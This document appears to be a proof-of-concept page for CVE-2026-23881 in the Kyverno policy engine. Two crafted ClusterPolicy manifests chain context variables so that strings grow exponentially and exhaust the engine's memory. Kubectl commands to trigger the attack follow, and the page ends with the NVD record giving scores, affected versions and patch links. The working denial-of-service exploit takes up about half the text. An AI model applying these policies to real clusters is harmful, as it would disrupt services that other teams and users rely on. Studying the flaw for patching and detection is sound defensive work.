CVE-2026-23881

# CVE-2026-23881 PoC - Kyverno Unbounded Memory Consumption # This PoC demonstrates the memory exhaustion via crafted policy # Note: This is for educational purposes only apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: memory-exhaustion-poc spec: rules: - name: exploit-memory match: any: - resources: kinds: - Pod context: # Exponential string amplification through context variables - name: amplifiedData variable: # This creates exponential string growth value: "{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}{{request.object.metadata.name}}" - name: doubleAmplified variable: # Multiply the amplified data again value: "{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}{{amplifiedData}}" validate: message: "Memory exhaustion test" deny: conditions: all: - key: "{{doubleAmplified}}" operator: NotEqual value: "" --- # Alternative: Recursive context variable expansion apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: recursive-expansion-poc spec: rules: - name: recursive-exploit match: any: - resources: kinds: - Pod context: # Multiple chained variable references cause exponential growth - name: layer1 variable: value: "{{request.object.metadata.name}}{{request.object.metadata.name}}" - name: layer2 variable: value: "{{layer1}}{{layer1}}{{layer1}}{{layer1}}" - name: layer3 variable: value: "{{layer2}}{{layer2}}{{layer2}}{{layer2}}" - name: layer4 variable: value: "{{layer3}}{{layer3}}{{layer3}}{{layer3}}" - name: layer5 variable: value: "{{layer4}}{{layer4}}{{layer4}}{{layer4}}" validate: message: "Recursive context expansion" deny: conditions: all: - key: "{{layer5}}" operator: Equals value: "" # To trigger: Apply the policy and create any Pod # kubectl apply -f policy.yaml # kubectl run test-pod --image=nginx

{"cve": {"id": "CVE-2026-23881", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:12.733", "lastModified": "2026-02-02T15:20:13.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of service by crafting policies that exponentially amplify string data through context variables. Versions 1.16.3 and 1.15.3 contain a patch for the vulnerability."}, {"lang": "es", "value": "Kyverno es un motor de políticas diseñado para equipos de ingeniería de plataformas nativas de la nube. Las versiones anteriores a la 1.16.3 y 1.15.3 tienen un consumo de memoria ilimitado en el motor de políticas de Kyverno que permite a los usuarios con privilegios de creación de políticas causar una denegación de servicio mediante la elaboración de políticas que amplifican exponencialmente los datos de cadena a través de variables de contexto. Las versiones 1.16.3 y 1.15.3 contienen un parche para la vulnerabilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.15.3", "matchCriteriaId": "EC83E83A-2BA5-4A52-AF06-06E67CA03749"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.16.0", "versionEndExcluding": "1.16.3", "matchCriteriaId": "AFFC15A4-197B-44FB-985A-BDDE22679655"}]}]}], "references": [{"url": "https://github.com/kyverno/kyverno/commit/7a651be3a8c78dcabfbf4178b8d89026bf3b850f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kyverno/kyverno/commit/f5617f60920568a301740485472bf704892175b7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-r2rj-wwm5-x6mq", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}